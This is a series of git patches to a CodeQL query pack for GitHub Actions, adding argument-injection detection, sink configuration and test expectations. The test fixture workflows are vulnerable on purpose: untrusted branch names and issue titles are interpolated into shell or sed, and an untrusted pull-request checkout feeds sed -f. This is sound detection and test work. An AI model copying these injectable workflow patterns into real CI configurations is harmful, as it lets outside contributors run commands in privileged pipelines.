github.event.pull_request.body | ${{ github.event.pull_request.body }} | @@ -392,3 +393,4 @@ subpaths | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index f2fd5923034..e325205d8c8 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -298,6 +298,7 @@ nodes | .github/workflows/workflow_run_branches1.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches2.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | +| .github/workflows/workflow_run_branches4.yml:13:20:13:63 | github.event.workflow_run.head_branch | semmle.label | github.event.workflow_run.head_branch | subpaths #select | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user. | .github/actions/action3/action.yml:9:19:9:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | From 621ead2266e45d147494872f02716597c23f6d8b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 13:09:23 +0200 Subject: [PATCH 0393/1267] Fix branches logic --- .../.github/workflows/workflow_run_branches4.yml | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml new file mode 100644 index 00000000000..8540c3ef227 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/workflow_run_branches4.yml @@ -0,0 +1,13 @@ +name: Self-hosted runner (AMD mi250 CI caller) + +on: + workflow_run: + workflows: ["Test"] + branches: ["feat/**"] + types: [completed] + +jobs: + test: + runs-on: ubuntu-latest + steps: + - run: echo ${{ github.event.workflow_run.head_branch }} From 73c77bc93bf1dd99093e229722b4a3808067a7cb Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 10 Jul 2024 15:35:51 +0200 Subject: [PATCH 0394/1267] Initial implementation Pending work: complete the regular expression --- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 71 +++++++++++------- .../security/ArgumentInjectionQuery.qll | 73 +++++++++++++++++++ .../security/EnvPathInjectionQuery.qll | 2 +- .../actions/security/EnvVarInjectionQuery.qll | 2 +- ql/lib/ext/config/poisonable_steps.yml | 1 - .../CWE-094/ArgumentInjectionCritical.ql | 26 +++++++ .../CWE-094/ArgumentInjectionMedium.ql | 26 +++++++ .../Security/CWE-094/CodeInjectionCritical.ql | 1 - .../Security/CWE-094/CodeInjectionMedium.ql | 1 - .../.github/workflows/arg_injection.yml | 20 +++++ .../ArgumentInjectionCritical.expected | 8 ++ .../CWE-094/ArgumentInjectionCritical.qlref | 1 + .../CWE-094/ArgumentInjectionMedium.expected | 7 ++ .../CWE-094/ArgumentInjectionMedium.qlref | 1 + 14 files changed, 208 insertions(+), 32 deletions(-) create mode 100644 ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll create mode 100644 ql/src/Security/CWE-094/ArgumentInjectionCritical.ql create mode 100644 ql/src/Security/CWE-094/ArgumentInjectionMedium.ql create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected create mode 100644 ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 46c42da2652..ca0b7a70159 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -8,6 +8,7 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery +private import codeql.actions.security.ArgumentInjectionQuery /** * A unit class for adding additional taint steps. @@ -23,6 +24,42 @@ class AdditionalTaintStep extends Unit { abstract predicate step(DataFlow::Node node1, DataFlow::Node node2); } +bindingset[var_name, value] +predicate envToRunExpr(string var_name, Run run, string value) { + // e.g. echo "FOO=$BODY" >> $GITHUB_ENV + // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV + value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") + or + // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV + value.matches("$(echo %") and value.indexOf(var_name) > 0 + or + // e.g. + // FOO=$(echo $BODY) + // echo "FOO=$FOO" >> $GITHUB_ENV + exists(string line, string var2_name, string var2_value | run.getScript().splitAt("\n") = line | + var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and + var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and + var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and + ( + value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") + or + value.matches("$(echo %") and value.indexOf(var2_name) > 0 + ) + ) +} + +bindingset[var_name] +predicate envToArgInjSink(string var_name, Run run, string command) { + exists(string argument, string line, string regexp, int command_group, int argument_group | + run.getScript().splitAt("\n") = line and + argumentInjectionSinks(regexp, command_group, argument_group) and + argument = line.regexpCapture(regexp, argument_group) and + command = line.regexpCapture(regexp, command_group) and + envToRunExpr(var_name, run, argument) and + exists(run.getInScopeEnvVarExpr(var_name)) + ) +} + /** * Holds if an env var is passed to a Run step and this Run step, writes its value to a special workflow file. * - file is the name of the special workflow file: GITHUB_ENV, GITHUB_OUTPUT, GITHUB_PATH @@ -34,7 +71,7 @@ class AdditionalTaintStep extends Unit { * e.g. path (special name) for `echo "$BODY" >> $GITHUB_PATH` */ bindingset[var_name] -predicate envToRunFlow(string file, string var_name, Run run, string key) { +predicate envToSpecialFile(string file, string var_name, Run run, string key) { exists(string content, string value | ( file = "GITHUB_ENV" and @@ -50,30 +87,7 @@ predicate envToRunFlow(string file, string var_name, Run run, string key) { key = "path" and value = content ) and - ( - // e.g. echo "FOO=$BODY" >> $GITHUB_ENV - // e.g. echo "FOO=${BODY}" >> $GITHUB_ENV - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - // e.g. echo "FOO=$(echo $BODY)" >> $GITHUB_ENV - value.matches("$(echo %") and value.indexOf(var_name) > 0 - or - // e.g. - // FOO=$(echo $BODY) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string line, string var2_name, string var2_value | - run.getScript().splitAt("\n") = line - | - var2_name = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 1) and - var2_value = line.regexpCapture("([a-zA-Z0-9\\-_]+)=(.*)", 2) and - var2_value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") and - ( - value.matches("%$" + ["", "{", "ENV{"] + var2_name + "%") - or - value.matches("$(echo %") and value.indexOf(var2_name) > 0 - ) - ) - ) + envToRunExpr(var_name, run, value) ) } @@ -89,7 +103,10 @@ predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { exists(Run run, string var_name | run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run.getScriptScalar() and - envToRunFlow(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) + ( + envToSpecialFile(["GITHUB_ENV", "GITHUB_PATH"], var_name, run, _) or + envToArgInjSink(var_name, run, _) + ) ) } @@ -110,7 +127,7 @@ predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlo exists(Run run, string var_name, string key | run.getInScopeEnvVarExpr(var_name) = pred.asExpr() and succ.asExpr() = run and - envToRunFlow("GITHUB_OUTPUT", var_name, run, key) and + envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) ) } diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll new file mode 100644 index 00000000000..be80cb3295d --- /dev/null +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -0,0 +1,73 @@ +private import actions +private import codeql.actions.TaintTracking +private import codeql.actions.dataflow.ExternalFlow +import codeql.actions.dataflow.FlowSources +import codeql.actions.dataflow.FlowSteps +import codeql.actions.DataFlow + +abstract class ArgumentInjectionSink extends DataFlow::Node { + abstract string getCommand(); +} + +/** + * Holds if a Run step declares an environment variable with contents from a local file. + * e.g. + * run: | + * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV + * echo "sha=$(> $GITHUB_ENV + *class ArgumentInjectionFromFileReadSink extends ArgumentInjectionSink { + * ArgumentInjectionFromFileReadSink() { + * exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | + * this.asExpr() = run.getScriptScalar() and + * step.getAFollowingStep() = run and + * writeToGitHubEnv(run, content) and + * extractVariableAndValue(content, _, value) and + * outputsPartialFileContent(value) + * ) + * } + *} + */ +predicate argumentInjectionSinks(string regexp, int command_group, int argument_group) { + regexp = ".*(sed) (.*)" and command_group = 1 and argument_group = 2 +} + +/** + * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. + * e.g. + * env: + * BODY: ${{ github.event.comment.body }} + * run: | + * sed "s/FOO/$BODY/g" > /tmp/foo + */ +class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { + string command; + + ArgumentInjectionFromEnvVarSink() { + exists(Run run, string var_name | + envToArgInjSink(var_name, run, command) and + exists(run.getInScopeEnvVarExpr(var_name)) and + run.getScriptScalar() = this.asExpr() + ) + } + + override string getCommand() { result = command } +} + +class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { + ArgumentInjectionFromMaDSink() { externallyDefinedSink(this, "argument-injection") } + + override string getCommand() { result = "unknown" } +} + +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate a code script. + */ +private module ArgumentInjectionConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink } +} + +/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +module ArgumentInjectionFlow = TaintTracking::Global; diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index cbdf9a917ce..e81c6954d72 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -36,7 +36,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToRunFlow("GITHUB_PATH", var_name, run, _) and + envToSpecialFile("GITHUB_PATH", var_name, run, _) and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 5a3dbebc512..86913421563 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -38,7 +38,7 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToRunFlow("GITHUB_ENV", var_name, run, _) and + envToSpecialFile("GITHUB_ENV", var_name, run, _) and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() ) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index f9274f54872..07fc7c7af73 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -46,7 +46,6 @@ extensions: - ["rails\\s+db:create"] - ["rails\\s+assets:precompile"] - ["rubocop"] - - ["sed\\s+-e"] - ["sed\\s+-f"] - ["stylelint"] - ["terraform"] diff --git a/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql b/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql new file mode 100644 index 00000000000..e56f613fac4 --- /dev/null +++ b/ql/src/Security/CWE-094/ArgumentInjectionCritical.ql @@ -0,0 +1,26 @@ +/** + * @name Argument injection + * @description Passing unsanitized user input to a command that will run it as a subprocess. + * @kind path-problem + * @problem.severity error + * @security-severity 9 + * @precision very-high + * @id actions/argument-injection/critical + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.ArgumentInjectionQuery +import ArgumentInjectionFlow::PathGraph + +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink +where + ArgumentInjectionFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) +select sink.getNode(), source, sink, + "Potential argument injection in $@ command, which may be controlled by an external user.", sink, + sink.getNode().(ArgumentInjectionSink).getCommand() diff --git a/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql b/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql new file mode 100644 index 00000000000..66c51ae3673 --- /dev/null +++ b/ql/src/Security/CWE-094/ArgumentInjectionMedium.ql @@ -0,0 +1,26 @@ +/** + * @name Argument injection + * @description Passing unsanitized user input to a command that will run it as a subprocess. + * @kind path-problem + * @problem.severity warning + * @security-severity 5.0 + * @precision medium + * @id actions/argument-injection/medium + * @tags actions + * security + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.ArgumentInjectionQuery +import ArgumentInjectionFlow::PathGraph + +from ArgumentInjectionFlow::PathNode source, ArgumentInjectionFlow::PathNode sink +where + ArgumentInjectionFlow::flowPath(source, sink) and + inNonPrivilegedContext(sink.getNode().asExpr()) +select sink.getNode(), source, sink, + "Potential argument injection in $@ command, which may be controlled by an external user.", sink, + sink.getNode().(ArgumentInjectionSink).getCommand() diff --git a/ql/src/Security/CWE-094/CodeInjectionCritical.ql b/ql/src/Security/CWE-094/CodeInjectionCritical.ql index f37c374658a..9319718b7fc 100644 --- a/ql/src/Security/CWE-094/CodeInjectionCritical.ql +++ b/ql/src/Security/CWE-094/CodeInjectionCritical.ql @@ -17,7 +17,6 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph -import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where diff --git a/ql/src/Security/CWE-094/CodeInjectionMedium.ql b/ql/src/Security/CWE-094/CodeInjectionMedium.ql index 43f4eb9c38a..0f8b6e13a29 100644 --- a/ql/src/Security/CWE-094/CodeInjectionMedium.ql +++ b/ql/src/Security/CWE-094/CodeInjectionMedium.ql @@ -17,7 +17,6 @@ import actions import codeql.actions.security.CodeInjectionQuery import CodeInjectionFlow::PathGraph -import codeql.actions.security.ControlChecks from CodeInjectionFlow::PathNode source, CodeInjectionFlow::PathNode sink where diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml new file mode 100644 index 00000000000..b5478a5e136 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/arg_injection.yml @@ -0,0 +1,20 @@ +name: Argument injection + +on: + issues: + types: [opened, edited] + +jobs: + test1: + runs-on: ubuntu-latest + env: + TITLE: ${{github.event.issue.title}} + steps: + - run: | + echo "s/FOO/$TITLE/g" + - run: | + sed "s/FOO/$TITLE/g" + + + + diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected new file mode 100644 index 00000000000..5b82e52682e --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.expected @@ -0,0 +1,8 @@ +edges +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +nodes +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +subpaths +#select +| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | Potential argument injection in $@ command, which may be controlled by an external user. | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | sed | diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref new file mode 100644 index 00000000000..6b3e2fd9f62 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-094/ArgumentInjectionCritical.ql diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected new file mode 100644 index 00000000000..37fd97270d7 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.expected @@ -0,0 +1,7 @@ +edges +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | provenance | | +nodes +| .github/workflows/arg_injection.yml:11:15:11:43 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/arg_injection.yml:15:14:16:31 | sed "s/FOO/$TITLE/g"\n | semmle.label | sed "s/FOO/$TITLE/g"\n | +subpaths +#select diff --git a/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref new file mode 100644 index 00000000000..b9c4ae95e43 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/ArgumentInjectionMedium.qlref @@ -0,0 +1 @@ +Security/CWE-094/ArgumentInjectionMedium.ql From 732f0dc29fb2fe9ab81941a0e228bbfad98f2b40 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Jul 2024 10:03:25 +0200 Subject: [PATCH 0395/1267] feat(queries): Argument Injection Make argument injection sinks congigurable with MaD --- ql/lib/codeql/actions/config/Config.qll | 15 +++++++++-- .../actions/config/ConfigExtensions.qll | 6 +++++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 3 +-- .../security/ArgumentInjectionQuery.qll | 25 +++---------------- .../ext/config/argument_injection_sinks.yml | 8 ++++++ .../.github/workflows/artifactpoisoning7.yml | 1 + .../.github/workflows/artifactpoisoning8.yml | 18 +++++++++++++ .../CWE-829/.github/workflows/test9.yml | 18 +++++++++++++ .../ArtifactPoisoningCritical.expected | 4 +++ .../CWE-829/ArtifactPoisoningMedium.expected | 3 +++ .../CWE-829/UnpinnedActionsTag.expected | 3 ++- .../UntrustedCheckoutCritical.expected | 9 ++++--- 12 files changed, 83 insertions(+), 30 deletions(-) create mode 100644 ql/lib/ext/config/argument_injection_sinks.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml diff --git a/ql/lib/codeql/actions/config/Config.qll b/ql/lib/codeql/actions/config/Config.qll index dd63fda93d1..1cc8ce4eb8a 100644 --- a/ql/lib/codeql/actions/config/Config.qll +++ b/ql/lib/codeql/actions/config/Config.qll @@ -46,7 +46,7 @@ predicate externallyTriggerableEventsDataModel(string event) { } /** - * MaD models for poisonable commands + * MaD models for poisonable commands * Fields: * - regexp: Regular expression for matching poisonable commands */ @@ -74,7 +74,7 @@ predicate poisonableActionsDataModel(string action) { } /** - * MaD models for for event properties that can be user-controlled. + * MaD models for event properties that can be user-controlled. * Fields: * - property: event property * - kind: property kind @@ -82,3 +82,14 @@ predicate poisonableActionsDataModel(string action) { predicate untrustedEventPropertiesDataModel(string property, string kind) { Extensions::untrustedEventPropertiesDataModel(property, kind) } + +/** + * MaD models for arguments to commands that execute the given argument. + * Fields: + * - regexp: Regular expression for matching argument injections. + * - command_group: capture group for the command. + * - argument_group: capture group for the argument. + */ +predicate argumentInjectionSinksDataModel(string regexp, int command_group, int argument_group) { + Extensions::argumentInjectionSinksDataModel(regexp, command_group, argument_group) +} diff --git a/ql/lib/codeql/actions/config/ConfigExtensions.qll b/ql/lib/codeql/actions/config/ConfigExtensions.qll index 26e77ce7235..4a492edeadf 100644 --- a/ql/lib/codeql/actions/config/ConfigExtensions.qll +++ b/ql/lib/codeql/actions/config/ConfigExtensions.qll @@ -44,3 +44,9 @@ extensible predicate poisonableActionsDataModel(string action); */ extensible predicate untrustedEventPropertiesDataModel(string property, string kind); +/** + * Holds for arguments to commands that execute the given argument + */ +extensible predicate argumentInjectionSinksDataModel( + string regexp, int command_group, int argument_group +); diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index ca0b7a70159..a40e11bda95 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -8,7 +8,6 @@ private import codeql.actions.DataFlow private import codeql.actions.dataflow.FlowSources private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.security.ArtifactPoisoningQuery -private import codeql.actions.security.ArgumentInjectionQuery /** * A unit class for adding additional taint steps. @@ -52,7 +51,7 @@ bindingset[var_name] predicate envToArgInjSink(string var_name, Run run, string command) { exists(string argument, string line, string regexp, int command_group, int argument_group | run.getScript().splitAt("\n") = line and - argumentInjectionSinks(regexp, command_group, argument_group) and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and argument = line.regexpCapture(regexp, argument_group) and command = line.regexpCapture(regexp, command_group) and envToRunExpr(var_name, run, argument) and diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index be80cb3295d..bf29a1c8458 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -9,28 +9,6 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { abstract string getCommand(); } -/** - * Holds if a Run step declares an environment variable with contents from a local file. - * e.g. - * run: | - * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV - * echo "sha=$(> $GITHUB_ENV - *class ArgumentInjectionFromFileReadSink extends ArgumentInjectionSink { - * ArgumentInjectionFromFileReadSink() { - * exists(Run run, UntrustedArtifactDownloadStep step, string content, string value | - * this.asExpr() = run.getScriptScalar() and - * step.getAFollowingStep() = run and - * writeToGitHubEnv(run, content) and - * extractVariableAndValue(content, _, value) and - * outputsPartialFileContent(value) - * ) - * } - *} - */ -predicate argumentInjectionSinks(string regexp, int command_group, int argument_group) { - regexp = ".*(sed) (.*)" and command_group = 1 and argument_group = 2 -} - /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. * e.g. @@ -53,6 +31,9 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { override string getCommand() { result = command } } +/** + * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. + */ class ArgumentInjectionFromMaDSink extends ArgumentInjectionSink { ArgumentInjectionFromMaDSink() { externallyDefinedSink(this, "argument-injection") } diff --git a/ql/lib/ext/config/argument_injection_sinks.yml b/ql/lib/ext/config/argument_injection_sinks.yml new file mode 100644 index 00000000000..8a9350cfebb --- /dev/null +++ b/ql/lib/ext/config/argument_injection_sinks.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: github/actions-all + extensible: argumentInjectionSinksDataModel + # https://gtfobins.github.io/ + data: + - [".*(sed) (.*)", 1, 2] + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml index e815c3dd129..63acdc612b0 100644 --- a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning7.yml @@ -4,6 +4,7 @@ on: workflow_run jobs: my-second-job: + runs-on: ubuntu-latest steps: - name: download pr artifact uses: dawidd6/action-download-artifact@v2 diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml new file mode 100644 index 00000000000..8cb380ae043 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning8.yml @@ -0,0 +1,18 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + - name: Use artifact + run: | + sed -f config foo.md > bar.md diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml new file mode 100644 index 00000000000..6f7ff665be3 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml @@ -0,0 +1,18 @@ +name: OpenAPI +on: + pull_request_target: + +permissions: {} + +jobs: + base: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@a5ac7e51b41094c92402da3b24376905380afc29 # v4.1.6 + with: + ref: ${{ github.event.pull_request.head.sha }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + fetch-depth: 0 + - run: + sed -f script/config foo.md > bar.md + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index c6733eb66b8..6b9b0f670f3 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -1,4 +1,5 @@ edges +| .github/workflows/artifactpoisoning8.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | @@ -13,6 +14,8 @@ edges | 